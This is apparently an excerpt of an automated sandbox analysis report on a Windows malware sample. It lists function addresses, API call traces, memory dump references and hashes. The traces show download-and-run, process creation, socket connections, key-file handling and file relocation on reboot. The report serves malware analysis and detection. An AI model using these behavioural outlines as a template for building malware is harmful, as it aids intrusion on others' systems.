                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$_mbscat$??2@CloseCreateDirectoryHandlePointerSizeSystemWrite
                                                                    • String ID:
                                                                    • API String ID: 3654042657-0
                                                                    • Opcode ID: 8f5f734768059b5f08da243009e888a70b173ceccb029a8b62737f1ea6f3ba4d
                                                                    • Instruction ID: 4b4febb19f7623747715fdf2f4a8ce1cf6edbbbce5a55fed24a76b456659be86
                                                                    • Opcode Fuzzy Hash: 8f5f734768059b5f08da243009e888a70b173ceccb029a8b62737f1ea6f3ba4d
                                                                    • Instruction Fuzzy Hash: 24217171900228BAEB10EBA5CD89FDA7F7DEB06355F004165F644E6161CB744A948BA4
                                                                    Function 10006D72 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 106libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,?,?,?,?,?,10006B51), ref: 10006D98
                                                                    • GetProcAddress.KERNEL32(00000000,IsBadReadPtr), ref: 10006DA7
                                                                    • LoadLibraryA.KERNEL32(00000050,?,?,?,10006B51), ref: 10006DE1
                                                                    • realloc.MSVCRT ref: 10006E00
                                                                    • GetProcAddress.KERNEL32(?,?), ref: 10006E59
                                                                    • FreeLibrary.KERNEL32(?,10006B51), ref: 10006E9B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressLoadProc$Freerealloc
                                                                    • String ID: IsBadReadPtr$kernel32.dll
                                                                    • API String ID: 343009874-2271619998
                                                                    • Opcode ID: 9edfece79cba95e15e08a13c92d70f32224e10f3ea16ca1e90f40b87946399e3
                                                                    • Instruction ID: da8a72daa7f632914fc606c256c078ce701d9cf95f607820730a43d1e35a25ca
                                                                    • Opcode Fuzzy Hash: 9edfece79cba95e15e08a13c92d70f32224e10f3ea16ca1e90f40b87946399e3
                                                                    • Instruction Fuzzy Hash: C9410875A0031AEFEB50CF64CC84B9ABBB5FF083D4F218065E909A7254D734E950CB90
                                                                    Function 100056C2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,?,00000170), ref: 100056DE
                                                                    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 10005711
                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10005734
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10005746
                                                                    • strlen.MSVCRT ref: 10005753
                                                                    • wsprintfA.USER32 ref: 10005777
                                                                    • lstrcpyA.KERNEL32(?,?), ref: 10005790
                                                                      • Part of subcall function 100054CF: memset.MSVCRT ref: 100054EB
                                                                      • Part of subcall function 100054CF: strlen.MSVCRT ref: 10005532
                                                                      • Part of subcall function 100054CF: memset.MSVCRT ref: 10005598
                                                                      • Part of subcall function 100054CF: wsprintfA.USER32 ref: 100055B0
                                                                      • Part of subcall function 100054CF: memset.MSVCRT ref: 100055BF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$Filestrlenwsprintf$CloseCreateHandleWritelstrcpymemcpy
                                                                    • String ID: %s %s
                                                                    • API String ID: 1942971391-2939940506
                                                                    • Opcode ID: 06c2e90de353c534267921f2c978eeea5a158a7e0c7070a1faffab6799a03352
                                                                    • Instruction ID: df5e23c000e03a25dc9f69d28642bfb876d77e7272fd59ee277a9363454fddfc
                                                                    • Opcode Fuzzy Hash: 06c2e90de353c534267921f2c978eeea5a158a7e0c7070a1faffab6799a03352
                                                                    • Instruction Fuzzy Hash: 8431787250421DBAF750D7A4DC89FDB77BCDB05396F400562F609E2085EA31AE849B60
                                                                    Function 0040B3E4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _mbscpymemcpymemsetstrchrstrlen
                                                                    • String ID: .
                                                                    • API String ID: 1359815026-248832578
                                                                    • Opcode ID: 90e9dd46989f3b416236049e815e2126ee62ad742a5d0101ea50c0d0ef0d97c6
                                                                    • Instruction ID: 91cf6bfb0bb8575cc0dd6624110da73219ea2829cdee16e04117afdf4891bad6
                                                                    • Opcode Fuzzy Hash: 90e9dd46989f3b416236049e815e2126ee62ad742a5d0101ea50c0d0ef0d97c6
                                                                    • Instruction Fuzzy Hash: 9221D872904258BBCB10DFA9CD859DE3B68DB14344F1004BBF984E7243D7B89BD587A9
                                                                    Function 1000A1AC Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 61libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(user32.dll,?,?,00000000,?,00000000,Function_0000AF24,1000D460,000000FF,?,1000A02F,00000000), ref: 1000A1D4
                                                                    • GetProcAddress.KERNEL32(00000000,OpenInputDesktop), ref: 1000A1E9
                                                                    • GetProcAddress.KERNEL32(00000000,OpenDesktopA), ref: 1000A1F5
                                                                    • GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 1000A201
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad
                                                                    • String ID: CloseDesktop$OpenDesktopA$OpenInputDesktop$user32.dll
                                                                    • API String ID: 2238633743-3711086354
                                                                    • Opcode ID: ee8e47de5e59c45fce1fd1b93c555b8d1c0c13caf1cf6bbbe7368570f378d32c
                                                                    • Instruction ID: 1babc23fd8af8267a13775e70e8c95c559f03c610a7b34632bd0960902c24a4b
                                                                    • Opcode Fuzzy Hash: ee8e47de5e59c45fce1fd1b93c555b8d1c0c13caf1cf6bbbe7368570f378d32c
                                                                    • Instruction Fuzzy Hash: 2E116D75D00229EBEB11DBA9DC45ADDBBB8FB09690F114236F611B2294DB755C40CBA0
                                                                    Function 0040A537 Relevance: 13.5, APIs: 9, Instructions: 46networksleepthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WSAStartup.WS2_32(00000202,?), ref: 0040A54D
                                                                    • memset.MSVCRT ref: 0040A55C
                                                                    • htons.WS2_32(100149C4), ref: 0040A571
                                                                    • inet_addr.WS2_32(10014E04), ref: 0040A580
                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040A597
                                                                    • connect.WS2_32(00000000,00000002,00000010), ref: 0040A5A6
                                                                    • Sleep.KERNEL32(00000028), ref: 0040A5AE
                                                                    • closesocket.WS2_32(00000000), ref: 0040A5B5
                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 0040A5C5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitSleepStartupThreadUserclosesocketconnecthtonsinet_addrmemsetsocket
                                                                    • String ID:
                                                                    • API String ID: 1335291643-0
                                                                    • Opcode ID: 622480f561da35962a2c343ab3763b015d1daaf266a5c8a429c3554f02ec77bc
                                                                    • Instruction ID: 55a79132d35615ca5f3d33928472b37ce0bebb47fc6d5ab29329d61f566ee789
                                                                    • Opcode Fuzzy Hash: 622480f561da35962a2c343ab3763b015d1daaf266a5c8a429c3554f02ec77bc
                                                                    • Instruction Fuzzy Hash: 5E015E7191133CBEFB10ABA09CCDEEF7B6CFB05780F448015F501961A5DBB44A448B66
                                                                    Function 100024EB Relevance: 13.5, APIs: 9, Instructions: 45networksleepthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WSAStartup.WS2_32(00000202,?), ref: 10002501
                                                                    • memset.MSVCRT ref: 10002510
                                                                    • htons.WS2_32(00000000), ref: 10002525
                                                                    • inet_addr.WS2_32(10014E04), ref: 10002534
                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 1000254B
                                                                    • connect.WS2_32(00000000,00000002,00000010), ref: 1000255A
                                                                    • Sleep.KERNEL32(00000028), ref: 10002562
                                                                    • closesocket.WS2_32(00000000), ref: 10002569
                                                                    • ExitThread.KERNEL32 ref: 10002579
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitSleepStartupThreadclosesocketconnecthtonsinet_addrmemsetsocket
                                                                    • String ID:
                                                                    • API String ID: 109928169-0
                                                                    • Opcode ID: 32e45b2445eb45400c0e7842ad5c74366bb545e8f0b6857efa875fc29e1fba7e
                                                                    • Instruction ID: 4b2411be4bb37ce7fb2a3ebd424c13f522f9c6df664b858043338d1c5bb194b9
                                                                    • Opcode Fuzzy Hash: 32e45b2445eb45400c0e7842ad5c74366bb545e8f0b6857efa875fc29e1fba7e
                                                                    • Instruction Fuzzy Hash: 1A015E7195136CBAFB00ABA09CCDEEA7A6CFB06381F448115F501961A5DB744A448B65
                                                                    Function 0040F347 Relevance: 13.5, APIs: 1, Strings: 8, Instructions: 36stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1A3
                                                                      • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1B5
                                                                      • Part of subcall function 0040F177: wsprintfA.USER32 ref: 0040F25B
                                                                    • lstrcpy.KERNEL32(?,1001348C), ref: 0040F39C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$lstrcpywsprintf
                                                                    • String ID: M$T$a$e$i$k$m$r
                                                                    • API String ID: 993010004-394501062
                                                                    • Opcode ID: 758bd59863ab867d02f0ac739eeb28c0c0cf3f15cf9d61a7406831dee3f063e2
                                                                    • Instruction ID: 806940ddc6176a079b7faf898d6a197000d8fe1ee52352c01640b0c79db0c027
                                                                    • Opcode Fuzzy Hash: 758bd59863ab867d02f0ac739eeb28c0c0cf3f15cf9d61a7406831dee3f063e2
                                                                    • Instruction Fuzzy Hash: 7AF08620D042C8FAEF0297A5CC48BDE7F799F52758F0480E9E95076282C3BA5619C776
                                                                    Function 0040D91B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 77stringprocessCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 0040D929
                                                                    • memset.MSVCRT ref: 0040D947
                                                                      • Part of subcall function 00412618: memset.MSVCRT ref: 0041264D
                                                                      • Part of subcall function 00412618: memset.MSVCRT ref: 00412660
                                                                      • Part of subcall function 00412618: memset.MSVCRT ref: 0041266E
                                                                      • Part of subcall function 00412618: LoadLibraryA.KERNEL32(100140CC,?,?,?,?,?,?,?,00000104,00000000), ref: 0041267B
                                                                      • Part of subcall function 00412618: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,00000104,00000000), ref: 00412858
                                                                    • lstrlen.KERNEL32(?), ref: 0040D976
                                                                    • strstr.MSVCRT ref: 0040D98C
                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0040D99C
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0040D9E2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$Library$CreateFreeLoadProcesslstrcpylstrlenstrlenstrstr
                                                                    • String ID: D
                                                                    • API String ID: 2666049651-2746444292
                                                                    • Opcode ID: 7c43e2881ab051d66cccc48ca481354fe3a72dcd877bbe56901919aa72d22bbf
                                                                    • Instruction ID: c5ced43407b237d6a84c053058033a74fab7f62356e831f2adb2d5d7aa0be0e9
                                                                    • Opcode Fuzzy Hash: 7c43e2881ab051d66cccc48ca481354fe3a72dcd877bbe56901919aa72d22bbf
                                                                    • Instruction Fuzzy Hash: ED2151B2901228EADF209BE1DD49EDF7B7CEF45351F100426FA05F6140DB749689CBA4
                                                                    Function 10008542 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71stringfilenetworkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 10008550
                                                                    • malloc.MSVCRT ref: 10008562
                                                                    • memcpy.MSVCRT(00000000,?,00000001), ref: 1000856F
                                                                    • strrchr.MSVCRT ref: 10008577
                                                                    • wsprintfA.USER32 ref: 100085AA
                                                                    • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 100085C0
                                                                      • Part of subcall function 1000A42D: GetFileAttributesA.KERNEL32(00000000,100085D6,00000000,00000000,00000000,00000000,00000000), ref: 1000A431
                                                                      • Part of subcall function 1000A42D: GetLastError.KERNEL32 ref: 1000A43C
                                                                      • Part of subcall function 100083B0: memset.MSVCRT ref: 100083CF
                                                                      • Part of subcall function 100083B0: strrchr.MSVCRT ref: 100083D9
                                                                      • Part of subcall function 100083B0: RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,00000000), ref: 100083FA
                                                                      • Part of subcall function 100083B0: RegQueryValueA.ADVAPI32(00000000,00000000,?,00000000), ref: 10008419
                                                                      • Part of subcall function 100083B0: RegCloseKey.ADVAPI32(00000000), ref: 10008424
                                                                      • Part of subcall function 100083B0: memset.MSVCRT ref: 10008434
                                                                      • Part of subcall function 100083B0: wsprintfA.USER32 ref: 1000844C
                                                                      • Part of subcall function 100083B0: RegOpenKeyExA.ADVAPI32(80000000,?,00000000,000F003F,00000000), ref: 1000846C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileOpenmemsetstrrchrwsprintf$AttributesCloseDownloadErrorLastQueryValuemallocmemcpystrlen
                                                                    • String ID: c:\%s
                                                                    • API String ID: 1574582470-3279930864
                                                                    • Opcode ID: 8ab3e71583068a4c1c768449037085d1983ff1e15a6ac1be0df5c1a105e35aae
                                                                    • Instruction ID: 6473a6164af58c6d3f91cf5115bdfd47070c43fd0e80899155e04446fba04174
                                                                    • Opcode Fuzzy Hash: 8ab3e71583068a4c1c768449037085d1983ff1e15a6ac1be0df5c1a105e35aae
                                                                    • Instruction Fuzzy Hash: E81191769006293AFB10D7A49C89FDB7BACEF443D1F140476FB05D1087E774AA858BA4
                                                                    Function 1000692A Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40stringfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10006963
                                                                    • strcat.MSVCRT(?,10012A68), ref: 10006975
                                                                    • strcat.MSVCRT(?,Default,?,10012A68), ref: 10006986
                                                                    • strcat.MSVCRT(?,.key,?,Default,?,10012A68), ref: 10006997
                                                                    • DeleteFileA.KERNEL32(?), ref: 100069A6
                                                                      • Part of subcall function 10006840: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10006875
                                                                      • Part of subcall function 10006840: strcat.MSVCRT(?,10012A68), ref: 10006887
                                                                      • Part of subcall function 10006840: strcat.MSVCRT(?,Default,?,10012A68), ref: 10006898
                                                                      • Part of subcall function 10006840: strcat.MSVCRT(?,.key,?,Default,?,10012A68), ref: 100068A9
                                                                      • Part of subcall function 10006840: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 100068C8
                                                                      • Part of subcall function 10006840: GetFileSize.KERNEL32(00000000,00000000), ref: 100068D9
                                                                      • Part of subcall function 10006840: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 100068E2
                                                                      • Part of subcall function 10006840: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 100068F4
                                                                      • Part of subcall function 10006840: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10006914
                                                                      • Part of subcall function 10006840: CloseHandle.KERNEL32(?), ref: 1000691E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: strcat$File$DirectorySystem$??2@??3@CloseCreateDeleteHandleReadSize
                                                                    • String ID: .key$Default
                                                                    • API String ID: 3194684379-1583214558
                                                                    • Opcode ID: 9e19c7fdd1cfe48647b7358740303d42b5314bbbe55335f411ac4c9670a39299
                                                                    • Instruction ID: c47c83d7b4fbd5ea92990ccecd9374cfb4c53fdc13c1ca79624313f50a9dc8fb
                                                                    • Opcode Fuzzy Hash: 9e19c7fdd1cfe48647b7358740303d42b5314bbbe55335f411ac4c9670a39299
                                                                    • Instruction Fuzzy Hash: 380181F5C00259ABEB20EBA0CC8AEC977EDDB15394F140495F384A3045DBB4EAC58BA1
                                                                    Function 10008EDE Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 36fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,00000104), ref: 10008EFB
                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10008F09
                                                                    • GetTickCount.KERNEL32 ref: 10008F0F
                                                                    • wsprintfA.USER32 ref: 10008F29
                                                                    • MoveFileA.KERNEL32(?,?), ref: 10008F40
                                                                    • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 10008F51
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
